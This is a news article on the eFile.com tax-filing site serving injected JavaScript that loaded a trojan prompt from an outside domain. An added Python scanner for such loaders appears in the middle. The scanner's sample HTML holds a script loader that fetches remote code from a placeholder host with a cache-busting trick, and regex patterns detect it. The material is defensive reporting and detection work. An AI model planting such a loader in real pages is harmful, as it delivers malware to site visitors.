eFile.com, a provider of IRS-authorized e-file software for tax returns, has been found to be serving JavaScript malware on its website. The malicious script, called ‘popper.js,’ was discovered by security researchers and appeared to have been present on the site for weeks before being removed.
The code was designed to load JavaScript from the domain ‘infoamanewonliag[.]online,’ which was also found to be associated with an additional file, ‘update.js,’ that attempted to prompt users to download a trojan depending on their browser. The same IP address, which was located in Tokyo and hosted with Alibaba, was found to host both domains.
The incident came to light after users of eFile.com raised concerns that the site had been “hijacked.”
Upon investigation, security researchers found that the site had been compromised since at least the middle of March. The full extent of the attack is not yet known, and it remains unclear whether any visitors or customers of eFile.com were infected with the malware. At the time of writing, eFile.com had not responded to requests for comment.
The incident is particularly concerning given the timing, with U.S. taxpayers currently filing their tax returns ahead of the April 18th deadline.
The use of Math.random() in the code suggests that the threat actor intended to prevent caching and load a fresh copy of the malware each time eFile.com was visited, should any changes be made to the code. The malicious script, ‘popper.js,’ was found to be loaded on almost every page of eFile.com, at least up until April 1st.
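The pattern described above, a loader that assigns an off-site URL to a script’s src and appends Math.random() to defeat caching, is something a site owner can check for in their own served HTML and JavaScript. The following Python is an added example, not code from the article or from eFile.com; the allowlisted hosts and the sample content (with a placeholder host, not the real indicator) are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Hosts this site is expected to load script from (assumption for the example).
ALLOWED_HOSTS = {"efile.com", "www.efile.com"}

# Constructed sample page and script, modelled on the behaviour the article
# describes: one static <script> tag, plus an inline loader that points at an
# outside host and appends Math.random() as a cache-buster. The host name is
# a placeholder, not the domain named in the article.
SAMPLE_HTML = """
<script src="https://www.efile.com/js/popper.js"></script>
<script>
var s = document.createElement('script');
s.src = 'https://loader-host.invalid/update.js?' + Math.random();
document.head.appendChild(s);
var ok = document.createElement('script');
ok.src = 'https://www.efile.com/js/app.js';
</script>
"""

# Static <script src="..."> tags.
SCRIPT_TAG = re.compile(r"""<script[^>]+src=(['"])(https?://[^'"]+)\1""", re.I)
# Dynamic assignments such as  x.src = 'https://host/file.js?' + Math.random()
SRC_ASSIGN = re.compile(
    r"""\.src\s*=\s*(['"])(https?://[^'"]+)\1(\s*\+\s*Math\.random\(\))?"""
)


def find_suspicious_loaders(text, allowed_hosts=ALLOWED_HOSTS):
    """Return one dict per script reference that loads from a host outside the
    allowlist or that uses Math.random() to force a fresh fetch on every visit."""
    findings = []
    refs = [(m.group(2), False) for m in SCRIPT_TAG.finditer(text)]
    refs += [(m.group(2), m.group(3) is not None) for m in SRC_ASSIGN.finditer(text)]
    for url, cache_busted in refs:
        host = urlparse(url).hostname or ""
        if host not in allowed_hosts or cache_busted:
            findings.append({"url": url, "host": host, "cache_busted": cache_busted})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_loaders(SAMPLE_HTML):
        print(f)
```

Run against a saved copy of a page, the output lists every script reference that should be reviewed; an empty list means all script sources are on the allowlist and none use the cache-busting trick.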
Security researchers have criticized eFile.com for leaving the malicious code on its website for weeks, with one group calling out the company for not taking action despite the incident being reported on Reddit 15 days earlier.
The incident raises concerns about the security of e-file software providers and the potential impact on users’ personal and financial information.